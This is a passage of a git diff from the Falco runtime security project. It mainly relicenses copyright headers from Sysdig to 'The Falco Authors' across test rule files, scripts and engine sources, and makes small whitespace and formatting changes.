@@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/invalid_rule_output.yaml b/test/rules/invalid_rule_output.yaml index 7d094b23..363866e1 100644 --- a/test/rules/invalid_rule_output.yaml +++ b/test/rules/invalid_rule_output.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -19,4 +18,4 @@ desc: A rule with an invalid output field condition: evt.type=open output: "An open was seen %not_a_real_field" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_append.yaml b/test/rules/list_append.yaml index ca71fe71..28c6e8a4 100644 --- a/test/rules/list_append.yaml +++ b/test/rules/list_append.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -26,4 +25,4 @@ desc: A process named cat does an open condition: evt.type=open and proc.name in (my_list) output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_append_failure.yaml b/test/rules/list_append_failure.yaml index 1917f46b..1dd45a3b 100644 --- a/test/rules/list_append_failure.yaml +++ b/test/rules/list_append_failure.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/list_append_false.yaml b/test/rules/list_append_false.yaml index c5054eca..e589aebc 100644 --- a/test/rules/list_append_false.yaml +++ b/test/rules/list_append_false.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -26,4 +25,4 @@ desc: A process named cat does an open condition: evt.type=open and proc.name in (my_list) output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_order.yaml b/test/rules/list_order.yaml index 367544a2..9097780e 100644 --- a/test/rules/list_order.yaml +++ b/test/rules/list_order.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/list_sub_bare.yaml b/test/rules/list_sub_bare.yaml index 4e06e765..477c99a7 100644 --- a/test/rules/list_sub_bare.yaml +++ b/test/rules/list_sub_bare.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -25,4 +24,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_sub_end.yaml b/test/rules/list_sub_end.yaml index 95f06fa5..39709b47 100644 --- a/test/rules/list_sub_end.yaml +++ b/test/rules/list_sub_end.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -25,4 +24,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_sub_front.yaml b/test/rules/list_sub_front.yaml index 2721eba0..cdc83e0d 100644 --- a/test/rules/list_sub_front.yaml +++ b/test/rules/list_sub_front.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/list_sub_mid.yaml b/test/rules/list_sub_mid.yaml index 586705f5..62f27dbc 100644 --- a/test/rules/list_sub_mid.yaml +++ b/test/rules/list_sub_mid.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/list_sub_whitespace.yaml b/test/rules/list_sub_whitespace.yaml index a0472c08..82c4a749 100644 --- a/test/rules/list_sub_whitespace.yaml +++ b/test/rules/list_sub_whitespace.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -25,4 +24,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/list_substring.yaml b/test/rules/list_substring.yaml index 1c36cd62..f4851702 100644 --- a/test/rules/list_substring.yaml +++ b/test/rules/list_substring.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/macro_append.yaml b/test/rules/macro_append.yaml index b57b9585..dd52363f 100644 --- a/test/rules/macro_append.yaml +++ b/test/rules/macro_append.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -26,4 +25,4 @@ desc: A process named cat does an open condition: evt.type=open and my_macro output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/macro_append_failure.yaml b/test/rules/macro_append_failure.yaml index d6a41bab..d70ddc7e 100644 --- a/test/rules/macro_append_failure.yaml +++ b/test/rules/macro_append_failure.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/macro_append_false.yaml b/test/rules/macro_append_false.yaml index 0e342bab..75887fdb 100644 --- a/test/rules/macro_append_false.yaml +++ b/test/rules/macro_append_false.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -26,4 +25,4 @@ desc: A process named cat does an open condition: evt.type=open and my_macro output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/macro_order.yaml b/test/rules/macro_order.yaml index 537a26a6..82ecc2b2 100644 --- a/test/rules/macro_order.yaml +++ b/test/rules/macro_order.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -28,4 +27,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/multiple_docs.yaml b/test/rules/multiple_docs.yaml index 1857ee07..78c71605 100644 --- a/test/rules/multiple_docs.yaml +++ b/test/rules/multiple_docs.yaml @@ -1,8 +1,7 @@ --- # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -35,9 +34,8 @@ priority: WARNING --- # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -63,4 +61,4 @@ desc: A process named cat does an access condition: evt.type=access and is_cat output: "An access was seen (command=%proc.cmdline)" - priority: INFO \ No newline at end of file + priority: INFO diff --git a/test/rules/null_output_field.yaml b/test/rules/null_output_field.yaml index 8462f5be..fb3c36e6 100644 --- a/test/rules/null_output_field.yaml +++ b/test/rules/null_output_field.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -19,4 +18,4 @@ desc: A process named cat does an open condition: evt.type=open and proc.name=cat output: "An open was seen (cport=%fd.cport command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/override_list.yaml b/test/rules/override_list.yaml index 6da75230..56d2e8d1 100644 --- a/test/rules/override_list.yaml +++ b/test/rules/override_list.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -16,4 +15,4 @@ # limitations under the License. # - list: cat_capable_binaries - items: [not-cat] \ No newline at end of file + items: [not-cat] diff --git a/test/rules/override_macro.yaml b/test/rules/override_macro.yaml index b5d62613..94d26288 100644 --- a/test/rules/override_macro.yaml +++ b/test/rules/override_macro.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/override_nested_list.yaml b/test/rules/override_nested_list.yaml index 5a3d09a0..7b2576b1 100644 --- a/test/rules/override_nested_list.yaml +++ b/test/rules/override_nested_list.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -16,4 +15,4 @@ # limitations under the License. # - list: cat_binaries - items: [not-cat] \ No newline at end of file + items: [not-cat] diff --git a/test/rules/override_rule.yaml b/test/rules/override_rule.yaml index 1db502b4..ecc975dc 100644 --- a/test/rules/override_rule.yaml +++ b/test/rules/override_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -19,4 +18,4 @@ desc: A process named cat does an open condition: evt.type=open and proc.name=not-cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/rule_append.yaml b/test/rules/rule_append.yaml index 37434fad..5441947f 100644 --- a/test/rules/rule_append.yaml +++ b/test/rules/rule_append.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/rule_append_failure.yaml b/test/rules/rule_append_failure.yaml index 2d321a17..63a02fe1 100644 --- a/test/rules/rule_append_failure.yaml +++ b/test/rules/rule_append_failure.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/rule_append_false.yaml b/test/rules/rule_append_false.yaml index 85556a15..8cb64276 100644 --- a/test/rules/rule_append_false.yaml +++ b/test/rules/rule_append_false.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -23,4 +22,4 @@ - rule: my_rule append: true - condition: and fd.name=not-a-real-file \ No newline at end of file + condition: and fd.name=not-a-real-file diff --git a/test/rules/rule_names_with_regex_chars.yaml b/test/rules/rule_names_with_regex_chars.yaml index 063fed5f..88646d78 100644 --- a/test/rules/rule_names_with_regex_chars.yaml +++ b/test/rules/rule_names_with_regex_chars.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -22,4 +21,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/rule_names_with_spaces.yaml b/test/rules/rule_names_with_spaces.yaml index fcb4a104..44c84286 100644 --- a/test/rules/rule_names_with_spaces.yaml +++ b/test/rules/rule_names_with_spaces.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -22,4 +21,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/rule_order.yaml b/test/rules/rule_order.yaml index fedb118a..8abcd905 100644 --- a/test/rules/rule_order.yaml +++ b/test/rules/rule_order.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/rules_dir/000-single_rule.yaml b/test/rules/rules_dir/000-single_rule.yaml index 37067331..0c6ffbdd 100644 --- a/test/rules/rules_dir/000-single_rule.yaml +++ b/test/rules/rules_dir/000-single_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -28,4 +27,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/rules_dir/001-double_rule.yaml b/test/rules/rules_dir/001-double_rule.yaml index fceee183..e70e40f0 100644 --- a/test/rules/rules_dir/001-double_rule.yaml +++ b/test/rules/rules_dir/001-double_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -27,4 +26,4 @@ desc: A process named cat does an access condition: evt.type=access and is_cat output: "An access was seen (command=%proc.cmdline)" - priority: INFO \ No newline at end of file + priority: INFO diff --git a/test/rules/single_rule.yaml b/test/rules/single_rule.yaml index ba25d3fe..de8d73ec 100644 --- a/test/rules/single_rule.yaml +++ b/test/rules/single_rule.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -31,4 +30,4 @@ desc: A process named cat does an open condition: evt.type=open and is_cat output: "An open was seen (command=%proc.cmdline)" - priority: WARNING \ No newline at end of file + priority: WARNING diff --git a/test/rules/single_rule_enabled_flag.yaml b/test/rules/single_rule_enabled_flag.yaml index 44f63a1d..1346b223 100644 --- a/test/rules/single_rule_enabled_flag.yaml +++ b/test/rules/single_rule_enabled_flag.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/skip_unknown_error.yaml b/test/rules/skip_unknown_error.yaml index 3e548355..c037fd8b 100644 --- a/test/rules/skip_unknown_error.yaml +++ b/test/rules/skip_unknown_error.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/skip_unknown_evt.yaml b/test/rules/skip_unknown_evt.yaml index 3e1625c9..591716cb 100644 --- a/test/rules/skip_unknown_evt.yaml +++ b/test/rules/skip_unknown_evt.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -20,4 +19,4 @@ condition: evt.type=open and proc.nobody=cat output: Never skip-if-unknown-filter: true - priority: INFO \ No newline at end of file + priority: INFO diff --git a/test/rules/skip_unknown_prefix.yaml b/test/rules/skip_unknown_prefix.yaml index 275cd6f9..3be603d4 100644 --- a/test/rules/skip_unknown_prefix.yaml +++ b/test/rules/skip_unknown_prefix.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -22,4 +21,4 @@ and proc.aname="ls" and proc.aname[1]="ls" and proc.apid=10 and proc.apid[1]=10 output: Never - priority: INFO \ No newline at end of file + priority: INFO diff --git a/test/rules/skip_unknown_unspec.yaml b/test/rules/skip_unknown_unspec.yaml index 28593ba2..c1c22b08 100644 --- a/test/rules/skip_unknown_unspec.yaml +++ b/test/rules/skip_unknown_unspec.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/syscalls.yaml b/test/rules/syscalls.yaml index 11ee533d..27b959de 100644 --- a/test/rules/syscalls.yaml +++ b/test/rules/syscalls.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/rules/tagged_rules.yaml b/test/rules/tagged_rules.yaml index 4319118a..de0929a5 100644 --- a/test/rules/tagged_rules.yaml +++ b/test/rules/tagged_rules.yaml @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/run_performance_tests.sh b/test/run_performance_tests.sh index 525a8276..32cec459 100644 --- a/test/run_performance_tests.sh +++ b/test/run_performance_tests.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/run_regression_tests.sh b/test/run_regression_tests.sh index c5aeb873..4cda3626 100755 --- a/test/run_regression_tests.sh +++ b/test/run_regression_tests.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/test/utils/run_sysdig.sh b/test/utils/run_sysdig.sh index 3a81abbc..c3fbb095 100644 --- a/test/utils/run_sysdig.sh +++ b/test/utils/run_sysdig.sh @@ -1,8 +1,7 @@ #!/usr/bin/env bash # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/tests/CMakeLists.txt b/tests/CMakeLists.txt index 292e30d1..f058614d 100644 --- a/tests/CMakeLists.txt +++ b/tests/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2019 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of diff --git a/tests/engine/test_token_bucket.cpp b/tests/engine/test_token_bucket.cpp index a907d85c..c95e39a2 100644 --- a/tests/engine/test_token_bucket.cpp +++ b/tests/engine/test_token_bucket.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/tests/falco/test_webserver.cpp b/tests/falco/test_webserver.cpp index 5f7cab57..1c649e73 100644 --- a/tests/falco/test_webserver.cpp +++ b/tests/falco/test_webserver.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/tests/test_base.cpp b/tests/test_base.cpp index 8048b15f..0359948f 100644 --- a/tests/test_base.cpp +++ b/tests/test_base.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2019 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/userspace/engine/CMakeLists.txt b/userspace/engine/CMakeLists.txt index 99d2ebe2..65028244 100644 --- a/userspace/engine/CMakeLists.txt +++ b/userspace/engine/CMakeLists.txt @@ -1,7 +1,6 @@ # -# Copyright (C) 2016-2018 Draios Inc dba Sysdig. +# Copyright (C) 2019 The Falco Authors. # -# This file is part of falco . # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. diff --git a/userspace/engine/config_falco_engine.h.in b/userspace/engine/config_falco_engine.h.in index d7855f75..eb6da7ba 100644 --- a/userspace/engine/config_falco_engine.h.in +++ b/userspace/engine/config_falco_engine.h.in @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/falco_common.cpp b/userspace/engine/falco_common.cpp index 1e45e18a..810066a0 100644 --- a/userspace/engine/falco_common.cpp +++ b/userspace/engine/falco_common.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/engine/falco_common.h b/userspace/engine/falco_common.h index 64659186..6f231490 100644 --- a/userspace/engine/falco_common.h +++ b/userspace/engine/falco_common.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/falco_engine.cpp b/userspace/engine/falco_engine.cpp index 98971be6..6c4bb171 100644 --- a/userspace/engine/falco_engine.cpp +++ b/userspace/engine/falco_engine.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/engine/falco_engine.h b/userspace/engine/falco_engine.h index de7da082..19097775 100644 --- a/userspace/engine/falco_engine.h +++ b/userspace/engine/falco_engine.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ // Gen filtering TODO diff --git a/userspace/engine/falco_engine_version.h b/userspace/engine/falco_engine_version.h index e77bd1a2..2b7e3c67 100644 --- a/userspace/engine/falco_engine_version.h +++ b/userspace/engine/falco_engine_version.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ // The version of rules/filter fields/etc supported by this falco diff --git a/userspace/engine/formats.cpp b/userspace/engine/formats.cpp index 5ae1a471..b95a78c2 100644 --- a/userspace/engine/formats.cpp +++ b/userspace/engine/formats.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/engine/formats.h b/userspace/engine/formats.h index 01677a63..7003f04d 100644 --- a/userspace/engine/formats.h +++ b/userspace/engine/formats.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2016-2018 Draios Inc dba Sysdig. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once diff --git a/userspace/engine/json_evt.cpp b/userspace/engine/json_evt.cpp index 81393f78..085f616d 100644 --- a/userspace/engine/json_evt.cpp +++ b/userspace/engine/json_evt.cpp @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include diff --git a/userspace/engine/json_evt.h b/userspace/engine/json_evt.h index 8bab2071..87b3e551 100644 --- a/userspace/engine/json_evt.h +++ b/userspace/engine/json_evt.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #pragma once @@ -62,19 +59,22 @@ protected: class json_event_filter_check : public gen_event_filter_check { public: - enum index_mode { + enum index_mode + { IDX_REQUIRED, IDX_ALLOWED, IDX_NONE }; 